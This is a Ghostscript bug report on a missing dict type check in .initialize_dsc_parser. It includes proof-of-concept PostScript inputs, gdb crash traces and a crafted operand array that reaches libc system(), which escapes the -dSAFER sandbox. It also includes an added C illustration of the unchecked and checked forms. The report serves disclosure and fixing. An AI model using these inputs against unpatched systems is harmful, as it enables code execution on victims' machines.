Bug 697190

Summary: .initialize_dsc_parser doesn't validate the parameter is a dict type before using it.
Product: Ghostscript
Reporter: Tavis Ormandy <taviso>
Component: General
Assignee: Ken Sharp <ken.sharp>
Status: RESOLVED FIXED
Severity: normal
CC: fw
Priority: P4
Version: 9.20
Hardware: PC
OS: Linux
Customer:
Word Size: ---

Description Tavis Ormandy 2016-10-04 15:23:22 UTC
.initialize_dsc_parser doesn't validate the parameter is a dict type before using it.

This is a security issue, because it can be abused to escape the -dSAFER sandbox.

GS>16#4141414141414141 .initialize_dsc_parser

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a65754 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:154
154	    gs_memory_t * const mem = (gs_memory_t *)dict_memory(pdict);
(gdb) x/i $pc
=> 0xa65754 <zinitialize_dsc_parser+43>:	mov    rax,QWORD PTR [rax+0x48]
(gdb) p/x $rax
$3 = 0x4141414141414141

Or trying random other types:

GS>currentdevice .initialize_dsc_parser

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a65775 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:155
155	    dsc_data_t * const data =
(gdb) x/i $pc
=> 0xa65775 <zinitialize_dsc_parser+76>:	call   rax
(gdb) p/x $rax
$10 = 0xc045894cc84d89cc
(gdb) x/x $rax
0xc045894cc84d89cc:	Cannot access memory at address 0xc045894cc84d89cc
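As an added illustration (not Ghostscript's own code and not the fix commit), the following plain-C model shows the pattern behind this report: an operand is dereferenced as a dict without looking at its type tag, beside the checked form that returns a typecheck error first. The ref/dict types, function names and the error code are constructed stand-ins.

```c
/* Constructed model of a tagged PostScript operand ("ref"); names and the
 * error code are stand-ins, not Ghostscript's psi/ definitions or its fix. */
typedef enum { t_integer, t_array, t_dictionary, t_device } ref_type;
typedef struct { int id; } gs_memory_t;           /* stand-in allocator */
typedef struct { gs_memory_t *memory; } dict_t;   /* stand-in dict body */
typedef struct {
    ref_type type;                                /* the type tag */
    union { long intval; void *ptr; } value;      /* untyped payload */
} ref;
enum { gs_error_typecheck = -20 };                /* hypothetical code */

/* Unchecked: the payload is cast to a dict and dereferenced regardless of
 * the tag. With an integer operand the integer bits become the dict
 * pointer, which is the SIGSEGV in the report. */
static const gs_memory_t *dsc_parser_memory_unchecked(const ref *op)
{
    const dict_t *pdict = (const dict_t *)op->value.ptr;
    return pdict->memory;
}

/* Checked: refuse any operand whose tag is not t_dictionary with a
 * typecheck error before the payload is ever read as a pointer. */
static int dsc_parser_memory_checked(const ref *op, const gs_memory_t **mem)
{
    if (op->type != t_dictionary)
        return gs_error_typecheck;
    *mem = ((const dict_t *)op->value.ptr)->memory;
    return 0;
}

/* An integer operand, as in the report, is rejected with typecheck. */
int demo_integer_operand(void)
{
    ref op; op.type = t_integer; op.value.intval = 0x41414141L;
    const gs_memory_t *mem = 0;
    return dsc_parser_memory_checked(&op, &mem);  /* -20 */
}

/* A genuine dict operand still yields its allocator, in both versions. */
int demo_dict_operand(void)
{
    gs_memory_t heap = { 7 };
    dict_t d = { &heap };
    ref op; op.type = t_dictionary; op.value.ptr = &d;
    const gs_memory_t *mem = 0;
    int code = dsc_parser_memory_checked(&op, &mem);
    return code == 0 && mem == &heap && dsc_parser_memory_unchecked(&op) == &heap;
}
```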
Comment 1 Tavis Ormandy 2016-10-04 16:16:47 UTC
This looks pretty simple to exploit; it's possible to bypass ASLR using bug 697169 and reading /proc/self/maps, then you can simply call any routine you want.

(gdb) p system
$1 = {int (const char *)} 0x7ffff6ef4220 <system>
(gdb) r
GPL Ghostscript 9.20 (2016-09-26)
Copyright (C) 2016 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>16#4141414141414141 [16#4141414141414141 16#4141414141414141 16#7ffff6ef4220 16#4141414141414141] .initialize_dsc_parser
sh: -c: line 0: syntax error near unexpected token `)'
sh: -c: line 0: `
                  hU)iAAAAAAAA|��'
Comment 2 Ken Sharp 2016-10-05 05:17:55 UTC
Fixed in commit 875a0095f37626a721c7ff57d606a0f95af03913